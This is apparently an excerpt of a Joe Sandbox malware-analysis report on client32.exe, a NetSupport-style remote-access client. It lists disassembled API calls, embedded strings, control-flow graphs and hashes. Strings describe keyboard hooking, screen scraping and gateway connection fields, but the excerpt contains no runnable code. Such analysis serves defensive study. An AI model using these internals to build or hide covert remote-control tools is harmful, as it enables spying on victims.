                                                                                                                                                                                                    • Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
• Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
• Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
• Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
APIs
• GetSystemMetrics.USER32(00002000), ref: 1102E234
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateEventMetricsSystem
• String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$305090$@r$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
• API String ID: 1866202007-3167175283
• Opcode ID: a0e9e5a4652df17d14e2c7ced784bb22a0bb21b6b50456f220e0995e75fb437e
• Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
• Opcode Fuzzy Hash: a0e9e5a4652df17d14e2c7ced784bb22a0bb21b6b50456f220e0995e75fb437e
• Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memsetwsprintf
                                                                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1984265443-3756774750
                                                                                                                                                                                                    • Opcode ID: 751978ab5b7e35652694628e66f30823bc1ffbebfd97f39c89f53af1c502ff7b
                                                                                                                                                                                                    • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 751978ab5b7e35652694628e66f30823bc1ffbebfd97f39c89f53af1c502ff7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 1257 685a3d00-685a3d42 call 685b1c50 call 685a3b80 1261 685a3d47-685a3d4f 1257->1261 1262 685a3d6c-685a3d6e 1261->1262 1263 685a3d51-685a3d6b call 685b28e1 1261->1263 1265 685a3d70-685a3d84 call 68596f50 1262->1265 1266 685a3d87-685a3da1 call 68598fb0 1262->1266 1265->1266 1272 685a3da3-685a3dc4 call 685963c0 call 685b28e1 1266->1272 1273 685a3dc5-685a3e44 call 68595e90 * 2 call 685a7be0 call 68595e20 lstrlenA 1266->1273 1286 685a3e98-685a3fbe call 68595500 call 68596050 call 685a7c70 * 2 call 685a7d00 * 3 call 68595060 call 685a7d00 call 685b1bfd call 685a7d00 gethostname call 685a7d00 call 6859b8e0 1273->1286 1287 685a3e46-685a3e95 call 685ad8b0 call 68595060 call 68594830 call 685b1bfd 1273->1287 1322 685a3fc0 1286->1322 1323 685a3fc5-685a3fe1 call 685a7d00 1286->1323 1287->1286 1322->1323 1326 685a3ff8-685a3ffe 1323->1326 1327 685a3fe3-685a3ff5 call 685a7d00 1323->1327 1329 685a421a-685a4263 call 685a7b60 call 685b1bfd call 685998d0 call 685a77e0 1326->1329 1330 685a4004-685a4022 call 68595e20 1326->1330 1327->1326 1358 685a4292-685a42aa call 685b28e1 1329->1358 1359 685a4265-685a4291 call 6859a4e0 call 685b28e1 1329->1359 1337 685a405a-685a4084 call 68595e20 1330->1337 1338 685a4024-685a4057 call 68595060 call 685a7d00 call 685b1bfd 1330->1338 1347 685a408a-685a41ce call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd 1337->1347 1348 685a41d1-685a4217 call 685a7d00 call 68595e20 call 685a7d00 1337->1348 1338->1337 1347->1348 1348->1329
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: _memset
• String ID: *Dept$*Gsk$1.1$305090$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
• API String ID: 2102423945-3026469383
• Opcode ID: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
• Instruction ID: 44891fd80584a1afe0cb340a92391f0779c0d43f19a44a21a32dfc9e2d24338d
• Opcode Fuzzy Hash: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
• Instruction Fuzzy Hash: 91E182B6C4061CAACB21DB648C90FFFB778AF99205FC045D9E90963141EB356F848FA5

Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 1398 1113fbe0-1113fc21 GetModuleFileNameA 1399 1113fc63 1398->1399 1400 1113fc23-1113fc36 call 11080be0 1398->1400 1402 1113fc69-1113fc6d 1399->1402 1400->1399 1406 1113fc38-1113fc61 LoadLibraryA 1400->1406 1404 1113fc89-1113fca7 GetModuleHandleA GetProcAddress 1402->1404 1405 1113fc6f-1113fc7c LoadLibraryA 1402->1405 1408 1113fcb7-1113fce0 GetProcAddress * 4 1404->1408 1409 1113fca9-1113fcb5 1404->1409 1405->1404 1407 1113fc7e-1113fc86 LoadLibraryA 1405->1407 1406->1402 1407->1404 1410 1113fce3-1113fd5b GetProcAddress * 10 call 1115e4d1 1408->1410 1409->1410 1412 1113fd60-1113fd63 1410->1412
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,74DF23A0), ref: 1113FC13
• LoadLibraryA.KERNEL32(?), ref: 1113FC5C
• LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
• LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
• GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
• GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
• GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
• GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
• GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
• GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
• GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
• GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
• GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
• GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
• GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
• GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
• GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
• GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
• GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
• GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
  • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
• String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
• API String ID: 3874234733-2061581830
• Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
• Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
• Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
• Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 1498 1113dad0-1113db15 call 11142a60 1501 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1498->1501 1502 1113db1b-1113db3d call 1105d340 1498->1502 1514 1113dc07 1501->1514 1515 1113dbd5-1113dbdc 1501->1515 1507 1113db8b-1113db92 1502->1507 1508 1113db3f-1113db5c call 11015e10 1502->1508 1507->1501 1512 1113db94-1113dba0 call 11017670 1507->1512 1517 1113db5e-1113db6b GetProcAddress 1508->1517 1518 1113db6d-1113db6f 1508->1518 1512->1501 1522 1113dba2 call 110cb920 1512->1522 1520 1113dc11-1113dc31 GetClassInfoExA 1514->1520 1515->1514 1519 1113dbde-1113dbe5 1515->1519 1517->1518 1523 1113db71-1113db73 SetLastError 1517->1523 1529 1113db79-1113db82 1518->1529 1519->1514 1524 1113dbe7-1113dc05 call 1105d340 1519->1524 1525 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1520->1525 1526 1113dcd9-1113dd34 1520->1526 1522->1501 1523->1529 1524->1520 1539 1113dc61-1113dc75 call 110290f0 1525->1539 1540 1113dc78-1113dcc0 call 11140b20 call 11140b50 LoadCursorA GetStockObject RegisterClassExA 1525->1540 1541 1113dd36-1113dd3d 1526->1541 1542 1113dd6e-1113dd75 1526->1542 1529->1507 1534 1113db84-1113db85 FreeLibrary 1529->1534 1534->1507 1539->1540 1540->1526 1566 1113dcc2-1113dcd6 call 110290f0 1540->1566 1541->1542 1544 1113dd3f-1113dd46 1541->1544 1546 1113ddb1-1113ddd5 call 1105d340 1542->1546 1547 1113dd77-1113dd86 call 1110c420 1542->1547 1544->1542 1550 1113dd48-1113dd5f call 11129900 LoadLibraryA 1544->1550 1557 1113dde3-1113dde8 1546->1557 1558 1113ddd7-1113dde1 1546->1558 1561 1113ddaa 1547->1561 1562 1113dd88-1113dda8 1547->1562 1550->1542 1565 1113dd61-1113dd69 GetProcAddress 1550->1565 1563 1113ddf4-1113ddfb 1557->1563 1564 1113ddea 1557->1564 1558->1563 1567 1113ddac 1561->1567 1562->1567 1568 1113de08-1113de25 call 11139490 1563->1568 
1569 1113ddfd-1113de03 call 110f58a0 1563->1569 1564->1563 1565->1542 1566->1526 1567->1546 1576 1113de2b-1113de32 1568->1576 1577 1113deda-1113deea 1568->1577 1569->1568 1578 1113de34-1113de46 call 1110c420 1576->1578 1579 1113de6f-1113de76 1576->1579 1588 1113de61 1578->1588 1589 1113de48-1113de5f call 11159ed0 1578->1589 1581 1113de78-1113de7f 1579->1581 1582 1113de9f-1113deb0 1579->1582 1584 1113de81 call 11131d10 1581->1584 1585 1113de86-1113de9a SetTimer 1581->1585 1586 1113deb2-1113deb9 1582->1586 1587 1113dec9-1113ded4 #17 LoadLibraryA 1582->1587 1584->1585 1585->1582 1586->1587 1591 1113debb-1113dec2 1586->1591 1587->1577 1593 1113de63-1113de6a 1588->1593 1589->1593 1591->1587 1594 1113dec4 call 1112a760 1591->1594 1593->1579 1594->1587
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1113DC3D
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                                                                                    • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                                                                                      • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                                                                                                                    • String ID: (r$*DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                                                                    • API String ID: 2794364348-3064451846
                                                                                                                                                                                                    • Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                                                                                    • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: $30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1029625771-1136126593
                                                                                                                                                                                                    • Opcode ID: ae16968fb801e45ed27c47994a58d337414de700442e9fa67dc2dbce8f1ce6b8
                                                                                                                                                                                                    • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae16968fb801e45ed27c47994a58d337414de700442e9fa67dc2dbce8f1ce6b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

                                                                                                                                                                                                    Control-flow Graph

APIs
• EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
• InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
• EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
• SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596450
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
• SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596484
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
• SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 685964C5
• shutdown.WSOCK32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964E9
• GetLastError.KERNEL32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964F2
• timeGetTime.WINMM(?,00000001,?,00000000,?,6859D77B,00000000), ref: 68596510
• #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596526
• GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596533
• timeGetTime.WINMM(?,00000000,?,6859D77B,00000000), ref: 68596540
• Sleep.KERNEL32(00000001,?,00000000,?,6859D77B,00000000), ref: 6859654B
• #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596563
• closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596574
• WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859657D
